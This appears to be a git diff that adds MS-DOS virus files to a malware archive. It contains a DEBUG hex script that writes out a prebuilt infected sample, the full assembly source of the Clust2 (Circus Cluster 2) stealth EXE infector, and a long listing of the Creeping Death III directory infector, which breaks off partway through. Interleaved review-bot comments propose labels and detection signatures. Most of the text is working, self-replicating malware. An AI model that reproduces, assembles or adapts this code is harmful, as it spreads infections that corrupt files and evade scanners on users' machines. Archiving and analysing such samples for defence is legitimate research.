+ + +N DUMMY.FIL +E 0100 4D 5A 93 00 06 00 00 00 20 00 00 00 FF FF 5E 00 +E 0110 00 A0 93 19 0D 00 5E 00 3E 00 00 00 01 00 FB 30 +E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0330 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 +E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0500 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0510 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0520 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0530 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0540 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0550 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0560 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 
0570 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0580 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0590 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0600 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0610 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0620 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0630 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0640 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0650 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0660 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0670 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0680 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0690 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0700 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0710 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0720 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0730 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0740 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0750 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0760 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0770 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0780 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0790 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07A0 90 90 90 90 90 90 90 90 90 90 90 
90 90 90 90 90 +E 07B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0800 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0810 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0820 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0830 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0840 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0850 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0860 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0870 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0880 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0890 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08E0 90 90 90 90 90 90 90 90 B8 00 4C CD 21 E8 00 00 +E 08F0 5D 81 ED 03 00 90 90 90 BB 21 00 03 DD B9 41 01 +E 0900 2E 8A 17 D0 CA 2E 88 17 43 E2 F5 E9 93 00 A6 A4 +E 0910 A0 17 3C FA 02 63 08 A7 C7 56 87 07 B5 00 73 20 +E 0920 00 EF E3 13 2C 13 02 47 17 02 47 07 02 8F 0C 0B +E 0930 02 00 41 B0 B4 0A 4D 04 7A 4D 04 E4 94 D7 96 21 +E 0940 86 E4 F2 40 90 C2 EC DE C6 58 40 C2 DC C8 40 D8 +E 0950 CA E8 40 E6 D8 D2 E0 40 E8 D0 CA 40 88 DE CE E6 +E 0960 40 DE CC 40 AE C2 E4 42 00 B6 86 C2 E8 E0 D0 D2 +E 0970 E6 D0 BA 00 8C D2 E4 E6 E8 A6 E8 E4 D2 D6 CA 00 +E 0980 96 E4 C2 CC E8 42 00 07 85 02 A0 63 12 A7 D1 A7 +E 0990 95 F3 26 A1 B0 01 C9 02 13 2C F2 02 47 EE 02 B6 +E 09A0 87 0C 66 81 1D 81 4C 07 7C 19 02 80 EA 06 D3 03 +E 09B0 00 71 42 6A 9B 42 5C 13 3D E2 02 5C 19 0D E6 02 +E 09C0 3C 69 A4 9B 42 4C 1D BE FD 66 ED 01 7C 00 00 9A +E 09D0 EA 16 19 B1 06 0C 06 00 80 1D B1 D7 DD 01 7C 00 +E 09E0 00 B4 EA 1A 8D 
0C 00 00 9A 07 5C 06 00 40 21 D7 +E 09F0 C3 8D 0C 00 00 B4 8F 0C 02 00 10 00 8F 0C 06 00 +E 0A00 40 00 3C B0 80 A0 0E 77 00 00 06 BB 73 4D 04 AA +E 0A10 7B 00 00 5C 15 2E 4C 11 AC 00 8A 86 C5 EB BA 71 +E 0A20 C6 4A 75 80 00 9B 42 71 42 4A 75 1B 02 0C 3E 9B +E 0A30 42 3E 0E 19 81 0A 20 00 5C 02 0D CA 02 F5 5C 06 +E 0A40 0D D2 02 1D A1 5C 17 4D CE 02 F7 66 81 66 DB EA +E 0A50 00 01 10 00 00 01 00 00 20 00 97 19 5A 0B 92 14 +E 0A60 1D 07 4D 5A 93 00 06 00 00 00 20 00 00 00 FF FF +E 0A70 5E 00 00 A0 00 00 0D 00 5E 00 3D 00 4B 74 05 2E +E 0A80 FF 2E 71 01 E8 02 00 EB F6 50 53 51 06 52 1E B9 +E 0A90 40 00 8B DA 80 3F 2E 74 06 43 E2 F8 E9 AE 00 80 +E 0AA0 7F 01 45 75 F7 80 7F 02 58 75 F1 80 7F 03 45 75 +E 0AB0 EB B8 00 43 E8 A8 00 2E 89 0E 6B 01 B8 01 43 33 +E 0AC0 C9 E8 9B 00 B8 02 3D E8 95 00 93 B8 00 57 E8 8E +E 0AD0 00 2E 89 0E 6F 01 2E 89 16 6D 01 0E 1F B4 3F B9 +E 0AE0 18 00 BA 75 01 E8 77 00 2E 81 3E 87 01 93 19 75 +E 0AF0 03 EB 55 90 E8 8C 00 50 52 E8 6A 00 5A 58 E8 0D +E 0B00 FE 53 51 52 BB 21 00 B9 41 01 2E 8A 17 D0 C2 2E +E 0B10 88 17 43 E2 F5 5A 59 5B B4 40 B9 A6 02 BA 00 00 +E 0B20 E8 3C 00 2E C7 06 87 01 93 19 E8 5B 00 B4 40 B9 +E 0B30 18 00 BA 75 01 E8 27 00 B8 01 57 2E 8B 0E 6F 01 +E 0B40 2E 8B 16 6D 01 E8 17 00 B4 3E E8 12 00 1F 5A B8 +E 0B50 01 43 2E 8B 0E 6B 01 E8 05 00 07 59 5B 58 C3 9C +E 0B60 2E FF 1E 71 01 C3 2E C4 06 89 01 2E A3 63 01 2E +E 0B70 8C 06 65 01 2E C4 06 83 01 2E 8C 06 67 01 2E A3 +E 0B80 69 01 C3 B8 02 42 EB 03 B8 00 42 33 D2 33 C9 E8 +E 0B90 CD FF C3 +RCX +0A93 +W +Q + + + -+- FirstStrike -+- diff --git a/MSDOS/Virus.MSDOS.Unknown.cclust2.asm b/MSDOS/Virus.MSDOS.Unknown.cclust2.asm new file mode 100644 index 00000000..f088f0cf --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cclust2.asm 
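Review bot: This file duplicates the Catphish listing already added as catphish.asm in the same commit and then appends a `DEBUG` script (`N DUMMY.FIL` … `RCX` / `0A93` / `W` / `Q`) that writes out a prebuilt infected sample, yet neither the filename nor the header hints at that. For a research corpus the distinction should be visible without reading to the end; a header comment such as `; NOTE: this copy also embeds a DEBUG hex script producing a pre-infected sample (DUMMY.FIL); handle as a live sample, not only as source` would let automated handling and scanner exclusions be configured deliberately. The trailing `-+- FirstStrike -+-` signature line after `Q` is outside both the listing and the script and would be dropped by the same clean-up.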
@@ -0,0 +1,279 @@
+;The Circus Cluster 2 virus is an experiment which TridenT finished after
+;the original Cluster virus was published in Crypt 17. The source
+;code in its original form is provided now.
+;
+;Credited to TridenT, Circus Cluster 2 uses some of
+;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed
+;tricky because it looked for "00" empty space below the header in
+;an EXEfile - if it found enough room for itself, it wrote itself out
+;to the empty space or "air" in the file. This hid the virus in the
+;file, but added no change in file size. This is a nice theme - one
+;made famous by the ZeroHunt virus which first did the same with
+;.COMfiles. In both cases, the viruses had to be picky about the
+;files they infected, limiting their spread. This is still true with
+;Circus Cluster 2 - it's an effective virus, but an extremely picky
+;one.
+;
+;First, Circus Cluster 2 will attempt to copy itself into
+;the "air" in an EXEfile just below the file header, if there is
+;enough room. The most common candidates for infection are standard
+;MS/PC-DOS utility programs, like FIND or FC, among others.
+;
+;
+;
+;Because Circus Cluster installs its own INT 13 disk hander, it then can
+;intercept all attempts to read from files for a quick look.
+;For example, looking at a hex dump of a Cluster-infected .EXE,
+;with Vern Berg's LIST, will show the files clean. Now, boot
+;the system clean and look again. You'll see Cluster in the file's
+;"00" space.
+;
+;Additional notes by Black Wolf & Urnst Kouch
+;Crypt Newsletter 22. Circus Cluster 2 can be quickly assembled with
+;the A86 shareware assembler.
+;----------------------------------------------------------------------
+;
+; Clust2 virus by John Tardy / TridenT
+;
+; Virus Name: Clust2
+; Aliases: Cluster-II, Circus Clusters-II
+; V Status: Released
+; Discovery: Not (yet)
+; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives,
+; decrease in aveable memory
+; Origin: The Netherlands
+; Eff Length: 386 bytes (EXE size doesn't change)
+; Type Code: ORhE - Overwriting Resident .EXE Infector
+; Detection Method:
+; Removal Instructions: Delete infected files or copy infected files with the
+; virus resident to a device driven unit.
+;
+; General Comments:
+; The Clust2 virus is not yet submitted to any antiviral authority. It
+; is from the TridenT Virus Research Centre and was written by someone
+; calling himself John Tardy. When an infected program is started, Clust2
+; will become resident in high memory, but below TOM. It hooks interrupt
+; 13h and will try to load the program again. Because of its stealth
+; abilities the original program is loaded and will execute normally.
+; The Clust2 virus infects files when a write request for interrupt 13h
+; is done. It will check if the buffer contains the 'MZ' signature and
+; that the candidate file isn't larger than 65000 bytes, and if there are
+; enough zeros in the EXE-header. If these conditions are met, Clust2
+; will convert the EXE file to a COM file and inserts its code in the
+; buffer, allowing the original write request to proceed. This way it
+; evades critical errors. The Clust2 virus is also stealth and can't be
+; detected with virus scanners or checksumming software if the virus is
+; resident. File-length and date doesn't change regardless if Clust2
+; is resident. It's also a slighty polymorphic virus, mutating a few
+; bytes in its decryptor. A wildcarded search string is needed to find it.
+; The following text is encrypted within the +; virus: +; +; "[Clust2]" +; "JT / TridenT" +; +; The Clust2 virus will not infect files on device driven units, like drives +; compressed with DoubleSpace. It will disinfect itself on the fly +; when copied to such a device. +; +; Sometimes it will issue a "sector not found" error when a file is +; copied to a disk drive. +; +; The Clust2 virus doesn't do anything beside replicate. +; + ORG 100H + +JUMPIE: JMP SHORT JUMPER + + ORG 180H + +JUMPER: CLC + MOV CX,DECRLEN +MORPH EQU $-2 +JASS: LEA SI,DECR +DECRYPT: XOR BYTE PTR [SI],0 +TRIG EQU $-1 +TRAG EQU $-2 +TROG: INC SI +TREG: LOOP DECRYPT + +DECR: MOV AX,3513H + INT 21H ; return interrupt 13h handler + MOV OLD13,BX ; segment: offset + MOV OLD13[2],ES + MOV AX,ES:[BX] + CMP AX,0FC80H ; compare with virus ID + JE EXIT ; terminate if virus resident + +DOINST: MOV AH,0DH ; empty disk buffers + INT 21H + + MOV AX,CS + DEC AX + MOV DS,AX + CMP BYTE PTR DS:[0],'Z' ; last chain? + JNE EXIT ; if not, terminate +RESIT: SUB WORD PTR DS:[3],VIRPAR+19H ; subtract from MCB size + SUB WORD PTR DS:[12H],VIRPAR+19H ; subtract from + LEA SI,JUMPER ; PSP top of memory + MOV DI,SI + MOV ES,DS:[12H] ; ES = new segment + MOV DS,CS + MOV CX,VIRLEN ; virus length + REP MOVSB ; copy it into memory + + MOV AX,2513H ; + MOV DS,ES + LEA DX,NEW13 ; set interrupt 13h + INT 21H ; into virus + + PUSH CS + POP ES + MOV BX,100H + MOV SP,BX + MOV AH,4AH + INT 21H ; modify memory allocation + PUSH CS + POP DS + MOV BX,DS:[2CH] + MOV ES,BX + MOV AH,49H + INT 21H + + XOR AX,AX + MOV DI,1 +SEEK: DEC DI ; seek for file executed + SCASW ; in environment + JNE SEEK ; located after two 0's + + LEA SI,DS:[DI+2] +EXEC: PUSH BX + PUSH CS + POP DS ; ds = environment segment + MOV BX,OFFSET PARAM + MOV DS:[BX+4],CS + MOV DS:[BX+8],CS + MOV DS:[BX+12],CS + POP DS + PUSH CS + POP ES + + MOV DI,OFFSET FILENAME + PUSH DI + MOV CX,40 + REP MOVSW + PUSH CS + POP DS + + POP DX + + MOV AX,4B00H ; load & execute file + 
INT 21H +EXIT: MOV AH,4DH ; + INT 21H + MOV AH,4CH + INT 21H + +OLD13 DW 0,0 + +ORG13: JMP D CS:[OLD13] ; jump to old interrupt 13h + +NEW13: CMP AH,3 ; is there a write to the disk? + JE CHECKEXE ; if so, check for infection op. + CMP AH,2 ; is it a disk read? + JNE ORG13 ; if not, to original int 13h +DO: PUSHF + CALL D CS:[OLD13] ; call interrupt 13h + CMP ES:[BX],7EEBH ; is sector infected? + JNE ERROR + MOV ES:[BX],'ZM' ; cover virus ID with 'MZ' + PUSH DI + PUSH CX + PUSH AX + + MOV CX,VIRLEN + XOR AX,AX + LEA DI,BX[80H] ; hash virus from sector when read + REP STOSB + + POP AX + POP CX + POP DI +ERROR: IRET + +CHECKEXE: CMP ES:[BX],'ZM' ; is an .EXEfile being written? + JNE ORG13 ; to original address if not + + CMP W ES:BX[4],(65000/512) ; is .EXEfile too large to + JNB ORG13 ; convert? Compare with value + ; = max size (6500) divided by + ; sector size + PUSH AX + PUSH CX + PUSH SI + PUSH DI + PUSH DS + + PUSH ES + POP DS + LEA SI,BX[80H] ; look in the .EXEfile header + MOV DI,SI + MOV CX,VIRLEN +FIND0: LODSB + OR AL,AL + LOOPE FIND0 ; check if field was hashed to 0's + OR CX,CX ; and exit + JNE NO0 ; if not + + XOR AX,AX + MOV DS,AX + MOV AX,DS:[046CH] + PUSH CS + POP DS + TEST AH,1 + JZ NOLOOPFLIP + XOR B TREG,2 +NOLOOPFLIP: TEST AH,2 + JZ NOCLCFLIP + XOR B JUMPER,1 +NOCLCFLIP: + ADD AX,VIRLEN + SHR AX,1 + MOV W MORPH,AX + MOV B TRIG,AH + XOR B TRAG,1 + XOR B JASS,1 + XOR B TROG,1 + MOV CX,CRYPT + LEA SI,JUMPER + REP MOVSB + MOV CX,DECRLEN + LEA SI,DECR +CODEIT: LODSB + XOR AL,AH + STOSB ; copy virus over 'air' in EXEheader + LOOP CODEIT ; after encrypting + MOV DI,BX + MOV AX,07EEBH ; insert jmp over original 'MZ' + STOSW + +NO0: POP DS + POP DI + POP SI + POP CX + POP AX + JMP ORG13 + + DB '[Clust2]' + +PARAM DW 0,80H,?,5CH,?,6CH,? + + DB 'JT / TridenT' + +FILENAME EQU $ +DECRLEN EQU $-DECR +CRYPT EQU DECR-JUMPER +VIRLEN EQU $-JUMPER +VIRPAR EQU ($-JUMPER)/16 + + 
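Review bot: The header's `Detection Method:` field is left empty even though the code in this hunk pins down what a scanner should look for: `CHECKEXE` ends with `MOV DI,BX` / `MOV AX,07EEBH` / `STOSW`, so an infected image on disk begins with the bytes `EB 7E` in place of `MZ`, and the `NEW13` read path (`CMP ES:[BX],7EEBH`, `MOV ES:[BX],'ZM'`, then `REP STOSB` over `VIRLEN` bytes at offset 80h) only presents a clean-looking header while the handler is resident. Suggest filling the field with `; Detection Method: on-disk image starts with EB 7E (JMP SHORT) instead of MZ; scan from a clean boot, the resident INT 13h handler hides the change`. The in-code comment `= max size (6500) divided by sector size` beside the `CMP W ES:BX[4],(65000/512)` check disagrees with the header's 65000-byte limit by a factor of ten and should read 65000. The word at `ES:BX[4]` is presumably the MZ page count, which is why the limit is expressed in 512-byte units; worth saying so in the comment.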
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdeath3.asm b/MSDOS/Virus.MSDOS.Unknown.cdeath3.asm new file mode 100644 index 00000000..5ee07186 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdeath3.asm 
@@ -0,0 +1,631 @@ +;*****************************************************************************; +; ; +; Creeping Death III (Encrypting, try to find it) ; +; ; +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code, ss:code + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + + org 5ch ; use the space reserved for + ; the fcbs and command line + ; for more inportant data, + ; because we won't need this + ; data when the virus is + ; installed + +EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt + +BPB_Buf db 32 dup(?) ; buffer for BPB + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + + + org 100h ; com-file starts at offset 100 + ; hex + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. 
Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 ; this part of the program + mov cx,400h-11 ; will decode the encoded +Repeat: xor byte ptr [si],0 ; program, so it can be + inc si ; executed + loop Repeat + +Main: mov sp,600h ; init stack + inc word ptr Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? 
+ jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 ; filename+path available ? 
+ jnb Exec ; yes, execute it + mov ax,cs ; get segment of MCB + dec ax + mov ds,ax + mov cl,8 ; count length of filename + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cl + and cl,7 +NextByte: mov si,8 ; search for this name in the + inc di ; parent PSP to find the path + push di ; to this file + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di ; name found, search for start + cmp byte ptr es:[di-1],0 ; of name+path + jne BeginName + mov si,di + mov bx,es + jmp short Exec ; execute it + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header ; prepare header of the viral + movsw ; device driver and save the + lodsw ; address of the dos strategy + mov es:StrBlock,ax ; and interrupt procedures + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. 
; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; environment available ? + jz Boot ; no, computer is rebooted + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax ; end of environment is marked + mov di,1 ; with two zero bytes +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset Filename ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. 
; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx ; store segment and offset of + mov cs:RequestSegment,es ; request block + retf ; return to dos (or whatever + ; called this device driver) + +Interrupt: push ax ; driver strategy block + push bx ; save registers + push cx + push dx + push si + push di + push ds + push es + + les bx,cs:Request ; es:bx = request block + push es ; ds:bx = request block + pop ds + mov al,ds:[bx+2] ; command code + + cmp al,4 ; read sector from disk + je Input + cmp al,8 ; write sector to disk + je Output + cmp al,9 + je Output + + call DoRequest ; let dos do handle the request + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb 